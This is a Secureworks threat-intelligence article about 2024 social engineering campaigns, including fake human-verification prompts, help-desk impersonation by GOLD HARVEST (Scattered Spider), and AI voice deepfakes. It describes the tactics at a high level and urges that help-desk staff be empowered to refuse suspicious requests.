Employees, particularly help desk staff, need to feel empowered to say “no” to suspicious requests or offers. They should also have an easily accessible channel for reporting the suspicious activity. The need is increasing as threat actors become more innovative. In 2024, Secureworks® Counter Threat Unit™ (CTU) researchers regularly encountered cybercriminals using novel social engineering techniques to dupe employees into helping to breach their employers' networks.
In general, cybercriminal activity is almost entirely opportunistic, and victimization is based on exposed vulnerabilities or available stolen credentials. Traditional social engineering tactics often rely on broad distribution, such as bulk phishing emails. In one novel opportunistic campaign, individuals searching for movies or other online streaming content on their corporate devices were served fake human verification prompts. The victims were required to complete a series of keyboard sequences to ‘prove' they were human before they could access the content. These actions caused execution of malicious PowerShell code that downloaded infostealer malware.
Newer social engineering tactics could suggest that threat actors sometimes preselect and research their targets. GOLD REBELLION has been observed spamming users with thousands of emails before posing as IT help desk workers via Teams or email and offering assistance to stop the flood. This ‘help' takes the form of installing legitimate remote access tools such as AnyDesk or Microsoft Quick Assist on the victim's computer, which gives the threat actor control of the device.
In other incidents, a threat actor called the target organization's help desk and impersonated a senior employee to request a credential reset. The reset allowed the threat actor to log in to the victim's environment, likely with the intention of stealing data and deploying ransomware. On one occasion, the initial victim did not have sufficient privileges, so the threat actor called the help desk again and posed as another employee to make the same request. Some of the tools used during these incidents suggest links to the GOLD HARVEST threat group (also known as Scattered Spider). This group was likely responsible for the high-profile 2023 ransomware attacks on Las Vegas giants MGM Resorts and Caesars Entertainment, working as affiliates of the BlackCat (also known as ALPHV) ransomware scheme operated by GOLD BLAZER. The MGM Resorts attack alone reportedly netted $100 million USD. Alleged members of GOLD HARVEST were arrested in England and Spain during 2024.
GOLD HARVEST, which comprises at least some native English-speaking threat actors, has a history of using voice-based social engineering in its attacks. In addition to deceiving help desk employees, the threat actors have used phone calls and SMS messages to convince victims to visit credential-harvesting sites, share one-time passwords, and accept multi-factor authentication (MFA) push requests, as well as to download remote access tools. The group has also used social engineering against mobile carrier support staff in SIM swap attacks to bypass MFA.
These voice-based attacks require the threat actors to be able to credibly impersonate the executive or employee they claim to be. In the short term, this need may change Russian cybercriminals' traditional reluctance to work with English-speaking threat actors. CTU™ researchers have observed threat groups advertising for native English-language (as well as French, Spanish, and other non-Russian-language) speakers on underground forums. In the medium term, artificial intelligence (AI) will exacerbate the threat from voice-based social engineering. AI voice-based deepfakes have been used in attacks against individuals, in CEO fraud, and in disinformation campaigns.
Voice-based social engineering may appeal to threat actors because it circumvents even comprehensive technical controls. It also produces a sense of urgency. Help desk operators that fell victim to the GOLD HARVEST attacks mentioned that they feel a sense of pressure when speaking to individuals they believe are senior personnel in their organization. Saying no to a credential-reset request from a C-level executive can be daunting.
To defend successfully against these types of attacks, that hesitancy needs to change. One of the most powerful defenses organizations can put in place against voice-based social engineering is to make it acceptable for help desk staff not to help. Employees must have the right to politely refuse requests that seem suspicious, no matter who they are from, until the employees can confirm that the request is genuine.
Learn more about GOLD HARVEST activity and fake human verification prompts. If you need urgent assistance with an incident, contact the Secureworks Incident Response team.